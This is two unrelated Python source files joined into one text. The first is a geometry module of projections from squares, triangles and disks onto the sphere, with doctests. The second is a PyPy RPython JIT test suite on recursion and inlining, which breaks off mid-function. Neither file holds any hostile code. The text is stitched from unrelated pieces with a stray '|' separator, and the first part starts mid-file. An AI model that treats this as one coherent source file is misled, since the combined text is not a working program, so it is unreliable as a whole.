_TEST_EQ_Q = xmath.normalize(np.array([[1, 0, 1],
[0, 1, 1],
[-1, 0, 1],
[0, -1, 1]]))
_TEST_SKEW_TRI = np.array([[0.8, 0.6, 0],
[0, 1, 0],
[0, 0, 1]])
_TEST_SKEW_Q = xmath.normalize(np.array([[1, 0, 1],
[0, 1, 1],
[-1, 0, 1],
[0, -1, 0]]))
_TEST_BARY = np.array([[1, 0.8, 0.6, 0.4, 0.2, 0.0],
[0, 0.2, 0.2, 0.2, 0.5, 0.5],
[0, 0.0, 0.2, 0.4, 0.3, 0.5]]).T
_TEST_XY = np.array([[0, 1, 1, 0, 0.5, 0.5, 0.5, 0.3, 0.3, 0.3],
[0, 0, 1, 1, 0, 0.5, 1, 0, 0.5, 1]]).T
_TEST_FREQ = 4, 2
_TEST_TRI_LINDEX = np.array([[0, 4, 6],
[1, 4, 5],
[2, 3, 5],
[3, 2, 5],
[2, 4, 4],
[3, 3, 4]])
_TEST_Q_LINDEX = np.array([[2, 0],
[2, 1],
[3, 1],
[4, 1],
[1, 2],
[2, 2]])
_TEST_DISK_C = np.exp(np.linspace(0, 2j*np.pi, 7))*np.linspace(0, 1, 7)
_TEST_DISK_R = xmath.complex_to_float2d(_TEST_DISK_C)
_TEST_TRI_PTS = np.array([[0.8, 0.6, 0],
[0, 1, 0],
[0, 0, 1],
[0.4, 0.8, 0],
[0, 0.5, 0.5],
[0.4, 0.3, 0.5],
[4/15, 8/15, 1/3]])
_TEST_SPHERE_PTS = xmath.normalize(_TEST_TRI_PTS)
#generic methods, valid on any-d, any shape
def square_to_quad(xy, base_pts):
"""Transforms a square in [0,1]^2 to a (possibly skew) quadrilateral
defined by base_pts.
Args:
xy: Array, shape [..., 2]. The 2d coordinates of the point.
base_pts: Array, shape [4, ...]. The coordinates of the quadrilateral.
Should be in counterclockwise order to maintain orientation.
Returns:
Coordinates in whatever space base_pts was defined in.
>>> square_to_quad(_TEST_XY[:, np.newaxis], _TEST_SKEW_Q)
array([[ 0.70710678, 0. , 0.70710678],
[ 0. , 0.70710678, 0.70710678],
[-0.70710678, 0. , 0.70710678],
[ 0. , -1. , 0. ],
[ 0.35355339, 0.35355339, 0.70710678],
[ 0. , -0.0732233 , 0.53033009],
[-0.35355339, -0.5 , 0.35355339],
[ 0.49497475, 0.21213203, 0.70710678],
[ 0.14142136, -0.24393398, 0.45961941],
[-0.21213203, -0.7 , 0.21213203]])
"""
a, b, c, d = base_pts[0], base_pts[1], base_pts[2], base_pts[3]
x, y = xy[..., 0], xy[..., 1]
return a + (b-a)*x + (d-a)*y + (a-b+c-d)*x*y
def tri_bary(bary, base_pts):
"""Transforms barycentric coordinates to a (Euclidean) triangle
defined by base_pts.
Args:
bary: Array, shape [..., 3]. Barycentric coordinates.
base_pts: Array, shape [3, ...]. Coordinates of the triangle.
Should be in counterclockwise order to maintain orientation.
Returns:
Coordinates in whatever space base_pts was define in.
>>> tri_bary(_TEST_BARY, _TEST_SKEW_TRI)
array([[ 0.8 , 0.6 , 0. ],
[ 0.64, 0.68, 0. ],
[ 0.48, 0.56, 0.2 ],
[ 0.32, 0.44, 0.4 ],
[ 0.16, 0.62, 0.3 ],
[ 0. , 0.5 , 0.5 ]])
"""
return bary.dot(base_pts)
#methods for disks
def square_to_disk(xy, rotation=1):#np.exp(1j*np.pi/4)):
"""Transforms square on [0,1]^2 to unit disk.
>>> np.round(square_to_disk(_TEST_XY), 6)
array([[-0.707107, -0.707107],
[ 0.707107, -0.707107],
[ 0.707107, 0.707107],
[-0.707107, 0.707107],
[ 0. , -1. ],
[ 0. , 0. ],
[ 0. , 1. ],
[-0.371391, -0.928477],
[-0.4 , 0. ],
[-0.371391, 0.928477]])
"""
pts = 2*xy - 1
r = np.max(np.abs(pts), axis=-1)
theta = np.arctan2(pts[..., 1], pts[..., 0])
result = r*np.exp(1j*theta)*rotation
return xmath.complex_to_float2d(result)
DISK_TRI_C = np.exp(2j*np.pi/3*np.arange(3))*1j
DISK_TRI_R = xmath.complex_to_float2d(DISK_TRI_C)
def tri_to_disk(bary, rotation=1, pts=DISK_TRI_C):
"""Transforms triangle in barycentric coordinates to unit disk.
tri_naive_slerp also does this when pts are on a great circle,
with somewhat different results.
>>> np.round(tri_to_disk(_TEST_BARY), 6)
array([[ 0. , 1. ],
[-0.240192, 0.970725],
[-0. , 0.4 ],
[ 0.34641 , 0.2 ],
[-0.261861, -0.302372],
[-0. , -1. ]])
"""
tri_pts = bary.dot(pts)
angle = np.angle(tri_pts)
r = 1 - 3*bary.min(axis=-1)
result = r*np.exp(1j*angle)*rotation
return xmath.complex_to_float2d(result)
DISK_SQ_C = np.array([1, 1j, -1, -1j])
DISK_SQ_R = xmath.complex_to_float2d(DISK_SQ_C)
def _sq_disk(bkdn, base_pts, freq, tweak):
sc = square_to_disk(bkdn.coord)
sc2 = sc/np.sqrt(2) + 0.5
result = square_to_quad(sc2[:, np.newaxis], base_pts)
return result
def _tri_disk(bkdn, base_pts, freq, tweak):
rebary = bary_tri(tri_to_disk(bkdn.coord), DISK_TRI_R)
return tri_bary(rebary, base_pts)
#disk -> sphere
def spherical_to_xyz(phi, theta):
"""Converts spherical coordinates to 3d xyz coordinates.
Args:
phi: Inclination
theta: Azimuth
Returns:
An array with of shape = [..., 3].
>>> phi = np.arccos(np.linspace(-1, 1, 7))
>>> theta = np.arcsin(np.linspace(-1, 1, 7))
>>> np.round(spherical_to_xyz(phi, theta), 6)
array([[ 0. , -0. , -1. ],
[ 0.555556, -0.496904, -0.666667],
[ 0.888889, -0.31427 , -0.333333],
[ 1. , 0. , 0. ],
[ 0.888889, 0.31427 , 0.333333],
[ 0.555556, 0.496904, 0.666667],
[ 0. , 0. , 1. ]])
"""
return np.array([np.sin(phi) * np.cos(theta), # pylint: disable=no-member
np.sin(phi) * np.sin(theta),
np.cos(phi)]).T
def lambert(disk):
"""Converts coordinates on the disk to spherical coordinates, using
the Lambert azimuthal equal-area projection.
Args:
disk: Array of shape [..., 2] representing points on the disk.
Returns:
phi, theta: Spherical coordinates
>>> phi, theta = lambert(_TEST_DISK_R)
>>> np.round(phi*180/np.pi, 2)
array([ 0. , 19.19, 38.94, 60. , 83.62, 112.89, 180. ])
>>> np.round(theta*180/np.pi, 2)
array([ 0., 60., 120., 180., -120., -60., -0.])
"""
theta = np.arctan2(disk[..., 1], disk[..., 0])
phi = 2*np.arcsin(np.linalg.norm(disk, axis=-1))
return phi, theta
def equidistant(disk):
"""Converts coordinates on the disk to spherical coordinates, using
the azimuthal equal-distance projection.
Args:
disk: Array of shape [..., 2] representing points on the disk.
Returns:
phi, theta: Spherical coordinates
>>> phi, theta = equidistant(_TEST_DISK_R)
>>> np.round(phi*180/np.pi, 2)
array([ 0., 30., 60., 90., 120., 150., 180.])
>>> np.round(theta*180/np.pi, 2)
array([ 0., 60., 120., 180., -120., -60., -0.])
"""
theta = np.arctan2(disk[..., 1], disk[..., 0])
phi = np.linalg.norm(disk, axis=-1)*np.pi
return phi, theta
#methods for spheres
#triangles -> spherical triangle
def tri_naive_slerp(bary, base_pts):
"""
Naive slerp (spherical linear interpolation) on a spherical triangle.
Args:
bary: Array, shape [..., 3]. Barycentric coordinates.
base_pts: Array, shape [3, ..., 3]. Coordinates of the triangle.
Should be in counterclockwise order to maintain orientation.
Returns:
An array of shape [..., 3], representing points in 3d-space.
>>> tri_naive_slerp(_TEST_BARY, _TEST_EQ_TRI)
array([[ 1. , 0. , 0. ],
[ 0.95105652, 0.30901699, 0. ],
[ 0.80901699, 0.30901699, 0.30901699],
[ 0.58778525, 0.30901699, 0.58778525],
[ 0.30901699, 0.70710678, 0.4539905 ],
[ 0. , 0.70710678, 0.70710678]])
"""
angle = xmath.central_angle_equilateral(base_pts)
b = np.sin(angle * bary) / np.sin(angle)
return b.dot(base_pts)
def tri_areal(bary, base_pts):
"""Given a triangle and spherical areal coordinates, returns the vectors
cooresponding to those coordinates.
Args:
bary: Array, shape [..., 3]. Barycentric coordinates.
base_pts: Array, shape [3, ..., 3]. Coordinates of the triangle.
Should be in counterclockwise order to maintain orientation.
Returns:
An array of shape [..., 3], representing points in 3d-space.
>>> tri_areal(_TEST_BARY, _TEST_SKEW_TRI)
array([[ 0.8 , 0.6 , 0. ],
[ 0.67564273, 0.7372292 , 0. ],
[ 0.59542957, 0.71123145, 0.37364883],
[ 0.42703426, 0.59682523, 0.67929477],
[ 0.21874817, 0.81375629, 0.53847 ],
[ 0. , 0.63544017, 0.77215011]])
"""
base_pts = xmath.normalize(base_pts)
area = xmath.triangle_solid_angle(base_pts[0], base_pts[1], base_pts[2])
area_i = bary * area
base_pts_iplus1 = np.roll(base_pts, -1, axis=0)
base_pts_iplus2 = np.roll(base_pts, 1, axis=0)
#FIXME whytf is this commented statement not equivalent to below?
# L = ((1 + np.cos(area_i))[:, np.newaxis]*
# np.cross(base_pts_iplus1, base_pts_iplus2) -
# np.sin(area_i)[:, np.newaxis]*
# (base_pts_iplus1 + base_pts_iplus2)).transpose((0,2,1))
L0 = ((1 + np.cos(area_i[..., 0]))[..., np.newaxis]*
np.cross(base_pts[1], base_pts[2]) -
np.sin(area_i[..., 0])[..., np.newaxis]*
(base_pts[1] + base_pts[2]))
L1 = ((1 + np.cos(area_i[..., 1]))[..., np.newaxis]*
np.cross(base_pts[2], base_pts[0]) -
np.sin(area_i[..., 1])[..., np.newaxis]*
(base_pts[2] + base_pts[0]))
L2 = ((1 + np.cos(area_i[..., 2]))[..., np.newaxis]*
np.cross(base_pts[0], base_pts[1]) -
np.sin(area_i[..., 2])[..., np.newaxis]*
(base_pts[0] + base_pts[1]))
L = np.stack([L0, L1, L2], axis=-2)
h = np.sin(area_i)*(1 + np.sum(base_pts_iplus1*base_pts_iplus2, axis=-1))
return np.linalg.solve(L, h)
def triangles_method2(lindex, base_pts, freq):
"""Triangles of method 2
Args:
lindex: Array, shape (..., 3). Linear indexes (should correspond
to freq)
base_pts: Array, shape (3, ..., 3). Coordinates of the triangle.
Should be in counterclockwise order to maintain orientation.
freq: 2-tuple. Frequency of the subdivision.
Returns:
Array of shape (..., 3, 3)
>>> np.round(triangles_method2(_TEST_TRI_LINDEX[1:3], _TEST_SKEW_TRI,
... _TEST_FREQ), 6)
array([[[ 0.205392, 0.183498, 0.051016],
[ 0.34558 , 0.317059, 0.10024 ],
[ 0.098942, 0.085439, 0.03013 ]],
<BLANKLINE>
[[ 0.283136, 0.377856, 0.038599],
[ 0.24816 , 0.339397, 0.042048],
[ 0.152133, 0.199126, 0.028172]]])
"""
n, m = freq
frame = breakdown.frame_triangle(n, m, base_pts=base_pts,
interp=xmath.slerp)
#get the normal to the great circle corresponding to the lines
#don't need to normalize this
gc_normals = np.cross(frame[..., 0, :], frame[..., 1, :])
index = np.arange(3)
pairs = gc_normals[index, lindex[:, index]]
#intersection of great circles = cross product of normals
ptx = np.cross(pairs, np.roll(pairs, 2, axis=1))
# cross product could give the point we want or its negative.
# test to see if the points are on the correct side of the sphere
# take the dot product of these vectors with the center of the
# base face. if it's positive, it's right, if not, negate it
center = np.sum(base_pts, axis=0)#don't need to normalize this
sign_correct = np.sum(center*ptx, axis=-1, keepdims=True) >= 0
result = np.where(sign_correct, ptx, -ptx)
return result
def tri_intersections(lindex, base_pts, freq, tweak=False):
"""Transforms a triangle to a spherical triangle using the method of
intersections
Args:
lindex: Array, shape (..., 3). Linear indexes (should correspond
to freq)
base_pts: Array, shape (3, ..., 3). Coordinates of the triangle.
Should be in counterclockwise order to maintain orientation.
freq: 2-tuple. Frequency of the subdivision.
tweak: Whether to normalize the points of the triangle before
taking their centroid. By default false.
Returns:
Array of shape (..., 3)
>>> tri_intersections(_TEST_TRI_LINDEX, _TEST_SKEW_TRI, _TEST_FREQ,
... tweak=True)
array([[ 0.8 , 0.6 , 0. ],
[ 0.73045891, 0.65102869, 0.20524575],
[ 0.59608649, 0.79682621, 0.09756895],
[ 0.4472136 , 0.89442719, 0. ],
[ 0.6127549 , 0.67069951, 0.41582597],
[ 0.46297244, 0.82965693, 0.30963537]])
"""
a, b = freq
pts = triangles_method2(lindex, base_pts, freq)
if tweak:
pts = xmath.normalize(pts)
result = pts.mean(axis=1)
result[(lindex[:, 0] == 0) &
(lindex[:, 1] == a) &
(lindex[:, 2] == a + b)] = base_pts[0]
result[(lindex[:, 0] == a + b) &
(lindex[:, 1] == 0) &
(lindex[:, 2] == a)] = base_pts[1]
result[(lindex[:, 0] == a) &
(lindex[:, 1] == a + b) &
(lindex[:, 2] == 0)] = base_pts[2]
return result
#squares -> spherical quadrilateral
def square_naive_slerp(xy, base_pts):
"""
Naive slerp (spherical linear interpolation) on a spherical square.
Args:
xy: Array, shape [..., 2]. XY coordinates on the square.
base_pts: Array, shape [4, ..., 3]. Coordinates of the square.
Should be in counterclockwise order to maintain orientation.
Returns:
An array of shape [..., 3], representing points in 3d-space.
>>> np.round(square_naive_slerp(_TEST_XY, _TEST_EQ_Q), 6)
array([[ 0.707107, 0. , 0.707107],
[ 0. , 0.707107, 0.707107],
[-0.707107, 0. , 0.707107],
[ 0. , -0.707107, 0.707107],
[ 0.408248, 0.408248, 0.816497],
[ 0. , 0. , 0.845299],
[-0.408248, -0.408248, 0.816497],
[ 0.546343, 0.252311, 0.798654],
[ 0.164878, -0.164878, 0.840669],
[-0.252311, -0.546343, 0.798654]])
"""
angle = xmath.central_angle_equilateral(base_pts)
x, y = xy[..., 0], xy[..., 1]
a = (1-x)*(1-y)
b = x*(1-y)
c = x*y
d = (1-x)*y
mat = np.sin(np.stack([a, b, c, d], axis=-1)*angle) / np.sin(angle)
return mat.dot(base_pts)
def square_naive_slerp_2(xy, base_pts):
"""
Variant naive slerp on a spherical square.
Args:
xy: Array, shape [..., 2]. XY coordinates on the square.
base_pts: Array, shape [4, ..., 3]. Coordinates of the square.
Should be in counterclockwise order to maintain orientation.
Returns:
An array of shape [..., 3], representing points in 3d-space.
>>> np.round(square_naive_slerp_2(_TEST_XY, _TEST_EQ_Q), 6)
array([[ 0.707107, 0. , 0.707107],
[ 0. , 0.707107, 0.707107],
[-0.707107, 0. , 0.707107],
[ 0. , -0.707107, 0.707107],
[ 0.408248, 0.408248, 0.816497],
[-0. , -0. , 0.942809],
[-0.408248, -0.408248, 0.816497],
[ 0.546343, 0.252311, 0.798654],
[ 0.169759, -0.169759, 0.922206],
[-0.252311, -0.546343, 0.798654]])
"""
angle = xmath.central_angle_equilateral(base_pts)
x, y = xy[..., 0], xy[..., 1]
sx = np.sin(x*angle)
sy = np.sin(y*angle)
scx = np.sin((1-x)*angle)
scy = np.sin((1-y)*angle)
a = scx * scy
b = sx * scy
c = sx * sy
d = scx * sy
mat = np.stack([a, b, c, d], axis=-1) / np.sin(angle)**2
return mat.dot(base_pts)
def _square_slerp(xy, base_pts):
"""
Helper function for square_slerp. This does the slerp, and then
square_slerp averages the two orientations together.
Args:
xy: Array, shape [..., 2]. XY coordinates on the square.
base_pts: Array, shape [4, ..., 3]. Coordinates of the square.
Should be in counterclockwise order to maintain orientation.
Returns:
An array of shape [..., 3], representing points in 3d-space.
>>> _square_slerp(_TEST_XY[:, np.newaxis], _TEST_SKEW_Q)
array([[ 0.70710678, 0. , 0.70710678],
[ 0. , 0.70710678, 0.70710678],
[-0.70710678, 0. , 0.70710678],
[ 0. , -1. , 0. ],
[ 0.40824829, 0.40824829, 0.81649658],
[-0.06780818, -0.22086837, 0.97294358],
[-0.5 , -0.70710678, 0.5 ],
[ 0.54634285, 0.25231132, 0.79865417],
[ 0.1721895 , -0.48808406, 0.85564287],
[-0.32101976, -0.89100652, 0.32101976]])
"""
a, b, c, d = base_pts[0], base_pts[1], base_pts[2], base_pts[3]
x, y = xy[..., 0], xy[..., 1]
ab = xmath.slerp(a, b, x)
dc = xmath.slerp(d, c, x)
result = xmath.slerp(ab, dc, y)
return result
def square_slerp(xy, base_pts):
"""Transforms a square in [0,1]^2 to a spherical quadrilateral
defined by base_pts, using spherical linear interpolation
Args:
xy: Array, shape [..., 2]. XY coordinates on the square.
base_pts: Array, shape [4, ..., 3]. Coordinates of the square.
Should be in counterclockwise order to maintain orientation.
Returns:
An array of shape [..., 3], representing points in 3d-space.
>>> square_slerp(_TEST_XY[:, np.newaxis], _TEST_SKEW_Q)
array([[ 0.70710678, 0. , 0.70710678],
[ 0. , 0.70710678, 0.70710678],
[-0.70710678, 0. , 0.70710678],
[ 0. , -1. , 0. ],
[ 0.40824829, 0.40824829, 0.81649658],
[ 0. , -0.2213779 , 0.9751881 ],
[-0.5 , -0.70710678, 0.5 ],
[ 0.54634285, 0.25231132, 0.79865417],
[ 0.21865594, -0.4721394 , 0.85397539],
[-0.32101976, -0.89100652, 0.32101976]])
"""
#have to do this twice and average them because just doing nested
#slerp isn't symmetric
one = _square_slerp(xy, base_pts)
two = _square_slerp(xy[..., ::-1], base_pts[[0, 3, 2, 1]])
return xmath.normalize(one + two)
def square_intersections(lindex, base_pts, freq):
"""Transforms a square to a spherical quadrilateral using the method of
intersections
Args:
lindex: Array, shape (..., 2). Linear indexes (should correspond
to freq)
base_pts: Array, shape (4, ..., 3). Coordinates of the triangle.
Should be in counterclockwise order to maintain orientation.
freq: 2-tuple. Frequency of the subdivision.
Returns:
Array of shape (..., 3)
>>> square_intersections(_TEST_Q_LINDEX, _TEST_SKEW_Q, _TEST_FREQ)
array([[ 0.70710678, 0. , 0.70710678],
[ 0.43240784, -0.07811493, 0.54287903],
[ 0.39952941, 0.13802823, 0.63415567],
[ 0.28927895, 0.28927895, 0.57855789],
[ 0.32664074, -0.46193977, 0.32664074],
[ 0.4267767 , -0.25 , 0.78033009]])
"""
a, b = freq
preframe = breakdown.frame_square(a, b)
frame = _square_slerp(preframe[..., np.newaxis, :], base_pts)
gc_normals = np.cross(frame[..., 0, :], frame[..., 1, :])
index = np.arange(2)
pairs = gc_normals[index, lindex[:, index]]
#intersection of great circles = cross product of normals
ptx = np.cross(pairs[:, 0], pairs[:, 1])
# cross product could give the point we want or its negative.
# test to see if the points are on the correct side of the sphere
# take the dot product of these vectors with the center of the
# base face. if it's positive, it's right, if not, negate it
center = np.sum(base_pts, axis=0)#don't need to normalize this
sign_correct = np.sum(center*ptx, axis=-1, keepdims=True) >= 0
result = np.where(sign_correct, ptx, -ptx)
result[(lindex[:, 0] == b) & (lindex[:, 1] == 0)] = base_pts[0]
result[(lindex[:, 0] == a + b) & (lindex[:, 1] == b)] = base_pts[1]
result[(lindex[:, 0] == a) & (lindex[:, 1] == a + b)] = base_pts[2]
result[(lindex[:, 0] == 0) & (lindex[:, 1] == a)] = base_pts[3]
return result
#extra crap
def bary_tri(tri, vertices):
"""Transforms a triangle back into barycentric coordinates.
Args:
tri: Triangle to calculate barycentric coordinates with respect to.
vertices: Array of vertices
Returns:
Array of barycentric coordinates
>>> np.round(np.abs(bary_tri(_TEST_TRI_PTS, _TEST_SKEW_TRI)), 6)
array([[ 1. , 0. , 0. ],
[ 0. , 1. , 0. ],
[ 0. , 0. , 1. ],
[ 0.5 , 0.5 , 0. ],
[ 0. , 0.5 , 0.5 ],
[ 0.5 , 0. , 0.5 ],
[ 0.333333, 0.333333, 0.333333]])
"""
afill = np.ones(vertices.shape[:-1])
a = np.concatenate([vertices, afill[..., np.newaxis]], axis=-1)
bfill = np.ones(tri.shape[:-1])
b = np.concatenate([tri, bfill[..., np.newaxis]], axis=-1)
#couldn't make np.linalg.lstsq cooperate here.
#this should be OK numerically
ainv = np.linalg.pinv(a)
return b.dot(ainv)
def to_sph_areal_coords(pts, triangle):
"""Given a triangle and pts within that triangle, returns the
spherical areal coordinates of the pts with respect to the triangle.
Args:
tri: Array with shape (..., 3). Triangle to calculate spherical
areal coordinates with respect to.
vertices: Array with shape (..., 3). Array of vertices
Returns:
Array of spherical areal coordinates
>>> to_sph_areal_coords(_TEST_SPHERE_PTS, _TEST_SKEW_TRI)
array([[ 1. , 0. , 0. ],
[ 0. , 1. , 0. ],
[ 0. , 0. , 1. ],
[ 0.5 , 0.5 , 0. ],
[ 0. , 0.5595371 , 0.4404629 ],
[ 0.5595371 , 0. , 0.4404629 ],
[ 0.36751409, 0.36751409, 0.26497182]])
"""
area = xmath.triangle_solid_angle(triangle[0], triangle[1], triangle[2])
area_i = xmath.triangle_solid_angle(pts[:, np.newaxis],
np.roll(triangle, 1, axis=0),
np.roll(triangle, -1, axis=0))
return area_i/area
def project_sphere(sphcoords, zfunc=np.arcsin, scale=180 / np.pi):
"""
Projects 3d coordinates on the sphere onto a 2d rectangle.
Corresponds to a number of rectangular map projections.
Args:
sphcoords: An array of shape (..., 3).
zfunc: A function to transform the z-values on the sphere. By
default this is np.arcsin, which makes the projection a
"rectangular" map projection. Use zfunc = lambda x: x
for an equal-area projection, and np.arctanh for Meractor.
scale: A scale function, applied to both coordinates of the result.
By default this is 180/np.pi, to
transform radians into degrees.
Returns:
The 2d rectangular coordinates, in an array of shape (..., 2).
By default, returns latitude and longitude, but if zfunc is
specified, the second coordinate will be whatever the function
transforms it to be.
>>> project_sphere(_TEST_SPHERE_PTS)
array([[ 36.86989765, 0. ],
[ 90. , 0. ],
[ 0. , 90. ],
[ 63.43494882, 0. ],
[ 90. , 45. ],
[ 36.86989765, 45. ],
[ 63.43494882, 29.20593225]])
"""
# specify shape of result
newdim = list(sphcoords.shape)
newdim[-1] = 2
result = np.empty(newdim)
# populate the array
result[..., 0] = np.arctan2(sphcoords[..., 1],
sphcoords[..., 0]) * scale
result[..., 1] = zfunc(sphcoords[..., 2]) * scale
return result
#parallel projections
def parallel_exact(pts, normal):
"""Projects points exactly onto the sphere parallel to the normal vector.
Args:
pts: Points to project
normal: Normal vector
>>> center = np.array([0, 0, 1])
>>> pts = np.array([[0.5, 0.5, 0],
... [1, 0, 0]])
>>> parallel_exact(pts, center)
array([[ 0. , 0. , 0.70710678],
[ 0. , 0. , 0. ]])
"""
vdotc = np.sum(pts * normal, axis=-1)
vdotv = norm(pts, axis=-1)**2
p = -vdotc + np.sqrt(np.fmax(1 + vdotc**2 - vdotv, 0))
return p[..., np.newaxis] * normal
def parallel_approx(pts, normal):
"""Approximately projects points onto the sphere parallel to the
normal vector.
Args:
pts: Points to project
normal: Normal vector
>>> center = np.array([0, 0, 1])
>>> pts = np.array([[0.5, 0.5, 0],
... [1, 0, 0]])
>>> parallel_approx(pts, center)
array([[ 0. , 0. , 0.29289322],
[ 0. , 0. , 0. ]])
"""
q = 1 - norm(pts, axis=-1)
return q[..., np.newaxis] * normal
def parallel(pts, normal, exact=True):
"""Projects points onto the sphere parallel to the normal vector.
Args:
pts: Points to project
normal: Normal vector
exact: Whether to project exactly or approximately.
Defaults to exact (True).
"""
if exact:
result = parallel_exact(pts, normal)
else:
result = parallel_approx(pts, normal)
return result
_FLAT = {3: lambda bkdn, base_pts, freq, tweak: tri_bary(bkdn.coord, base_pts),
4: lambda bkdn, base_pts, freq, tweak:
square_to_quad(bkdn.coord[:, np.newaxis], base_pts)}
_SLERP = {3: lambda bkdn, base_pts, freq, tweak: tri_naive_slerp(bkdn.coord,
base_pts),
4: lambda bkdn, base_pts, freq, tweak:
square_naive_slerp(bkdn.coord, base_pts)}
_SLERP2 = {3: lambda bkdn, base_pts, freq, tweak: tri_naive_slerp(bkdn.coord,
base_pts),
4: lambda bkdn, base_pts, freq, tweak:
square_naive_slerp_2(bkdn.coord, base_pts)}
_OTHER = {3: lambda bkdn, base_pts, freq, tweak: tri_areal(bkdn.coord,
base_pts),
4: lambda bkdn, base_pts, freq, tweak:
square_slerp(bkdn.coord[:, np.newaxis], base_pts)}
_GC = {3: lambda bkdn, base_pts, freq, tweak:
tri_intersections(bkdn.lindex, base_pts, freq, tweak),
4: lambda bkdn, base_pts, freq, tweak:
square_intersections(bkdn.lindex, base_pts, freq)}
_DISK = {3: _tri_disk,
4: _sq_disk}
PROJECTIONS = {'flat': _FLAT,
'nslerp': _SLERP,
'nslerp2': _SLERP2,
'other': _OTHER,
'gc': _GC,
'disk': _DISK}
PARALLEL = ['nslerp', 'nslerp2', 'disk']
|
|
import py
from rpython.rlib.jit import JitDriver, hint, set_param
from rpython.rlib.jit import unroll_safe, dont_look_inside, promote
from rpython.rlib.objectmodel import we_are_translated
from rpython.rlib.debug import fatalerror
from rpython.jit.metainterp.test.support import LLJitMixin
from rpython.jit.codewriter.policy import StopAtXPolicy
from rpython.rtyper.annlowlevel import hlstr
from rpython.jit.metainterp.warmspot import get_stats
from rpython.jit.backend.llsupport import codemap
class RecursiveTests:
def test_simple_recursion(self):
myjitdriver = JitDriver(greens=[], reds=['n', 'm'])
def f(n):
m = n - 2
while True:
myjitdriver.jit_merge_point(n=n, m=m)
n -= 1
if m == n:
return main(n) * 2
myjitdriver.can_enter_jit(n=n, m=m)
def main(n):
if n > 0:
return f(n+1)
else:
return 1
res = self.meta_interp(main, [20], enable_opts='')
assert res == main(20)
self.check_history(call_i=0)
def test_simple_recursion_with_exc(self):
myjitdriver = JitDriver(greens=[], reds=['n', 'm'])
class Error(Exception):
pass
def f(n):
m = n - 2
while True:
myjitdriver.jit_merge_point(n=n, m=m)
n -= 1
if n == 10:
raise Error
if m == n:
try:
return main(n) * 2
except Error:
return 2
myjitdriver.can_enter_jit(n=n, m=m)
def main(n):
if n > 0:
return f(n+1)
else:
return 1
res = self.meta_interp(main, [20], enable_opts='')
assert res == main(20)
def test_recursion_three_times(self):
myjitdriver = JitDriver(greens=[], reds=['n', 'm', 'total'])
def f(n):
m = n - 3
total = 0
while True:
myjitdriver.jit_merge_point(n=n, m=m, total=total)
n -= 1
total += main(n)
if m == n:
return total + 5
myjitdriver.can_enter_jit(n=n, m=m, total=total)
def main(n):
if n > 0:
return f(n)
else:
return 1
print
for i in range(1, 11):
print '%3d %9d' % (i, f(i))
res = self.meta_interp(main, [10], enable_opts='')
assert res == main(10)
self.check_enter_count_at_most(11)
def test_bug_1(self):
myjitdriver = JitDriver(greens=[], reds=['n', 'i', 'stack'])
def opaque(n, i):
if n == 1 and i == 19:
for j in range(20):
res = f(0) # recurse repeatedly, 20 times
assert res == 0
def f(n):
stack = [n]
i = 0
while i < 20:
myjitdriver.can_enter_jit(n=n, i=i, stack=stack)
myjitdriver.jit_merge_point(n=n, i=i, stack=stack)
opaque(n, i)
i += 1
return stack.pop()
res = self.meta_interp(f, [1], enable_opts='', repeat=2,
policy=StopAtXPolicy(opaque))
assert res == 1
def get_interpreter(self, codes):
ADD = "0"
JUMP_BACK = "1"
CALL = "2"
EXIT = "3"
def getloc(i, code):
return 'code="%s", i=%d' % (code, i)
jitdriver = JitDriver(greens = ['i', 'code'], reds = ['n'],
get_printable_location = getloc)
def interpret(codenum, n, i):
code = codes[codenum]
while i < len(code):
jitdriver.jit_merge_point(n=n, i=i, code=code)
op = code[i]
if op == ADD:
n += 1
i += 1
elif op == CALL:
n = interpret(1, n, 1)
i += 1
elif op == JUMP_BACK:
if n > 20:
return 42
i -= 2
jitdriver.can_enter_jit(n=n, i=i, code=code)
elif op == EXIT:
return n
else:
raise NotImplementedError
return n
return interpret
def test_inline(self):
code = "021"
subcode = "00"
codes = [code, subcode]
f = self.get_interpreter(codes)
assert self.meta_interp(f, [0, 0, 0], enable_opts='') == 42
self.check_resops(call_may_force_i=1, int_add=1, call=0)
assert self.meta_interp(f, [0, 0, 0], enable_opts='',
inline=True) == 42
self.check_resops(call=0, int_add=2, call_may_force_i=0,
guard_no_exception=0)
def test_inline_jitdriver_check(self):
code = "021"
subcode = "100"
codes = [code, subcode]
f = self.get_interpreter(codes)
assert self.meta_interp(f, [0, 0, 0], enable_opts='',
inline=True) == 42
# the call is fully inlined, because we jump to subcode[1], thus
# skipping completely the JUMP_BACK in subcode[0]
self.check_resops(call=0, call_may_force=0, call_assembler=0)
def test_guard_failure_in_inlined_function(self):
def p(pc, code):
code = hlstr(code)
return "%s %d %s" % (code, pc, code[pc])
myjitdriver = JitDriver(greens=['pc', 'code'], reds=['n'],
get_printable_location=p)
def f(code, n):
pc = 0
while pc < len(code):
myjitdriver.jit_merge_point(n=n, code=code, pc=pc)
op = code[pc]
if op == "-":
n -= 1
elif op == "c":
n = f("---i---", n)
elif op == "i":
if n % 5 == 1:
return n
elif op == "l":
if n > 0:
myjitdriver.can_enter_jit(n=n, code=code, pc=0)
pc = 0
continue
else:
assert 0
pc += 1
return n
def main(n):
return f("c-l", n)
print main(100)
res = self.meta_interp(main, [100], enable_opts='', inline=True)
assert res == 0
def test_guard_failure_and_then_exception_in_inlined_function(self):
def p(pc, code):
code = hlstr(code)
return "%s %d %s" % (code, pc, code[pc])
myjitdriver = JitDriver(greens=['pc', 'code'], reds=['n', 'flag'],
get_printable_location=p)
def f(code, n):
pc = 0
flag = False
while pc < len(code):
myjitdriver.jit_merge_point(n=n, code=code, pc=pc, flag=flag)
op = code[pc]
if op == "-":
n -= 1
elif op == "c":
try:
n = f("---ir---", n)
except Exception:
return n
elif op == "i":
if n < 200:
flag = True
elif op == "r":
if flag:
raise Exception
elif op == "l":
if n > 0:
myjitdriver.can_enter_jit(n=n, code=code, pc=0, flag=flag)
pc = 0
continue
else:
assert 0
pc += 1
return n
def main(n):
return f("c-l", n)
print main(1000)
res = self.meta_interp(main, [1000], enable_opts='', inline=True)
assert res == main(1000)
def test_exception_in_inlined_function(self):
def p(pc, code):
code = hlstr(code)
return "%s %d %s" % (code, pc, code[pc])
myjitdriver = JitDriver(greens=['pc', 'code'], reds=['n'],
get_printable_location=p)
class Exc(Exception):
pass
def f(code, n):
pc = 0
while pc < len(code):
myjitdriver.jit_merge_point(n=n, code=code, pc=pc)
op = code[pc]
if op == "-":
n -= 1
elif op == "c":
try:
n = f("---i---", n)
except Exc:
pass
elif op == "i":
if n % 5 == 1:
raise Exc
elif op == "l":
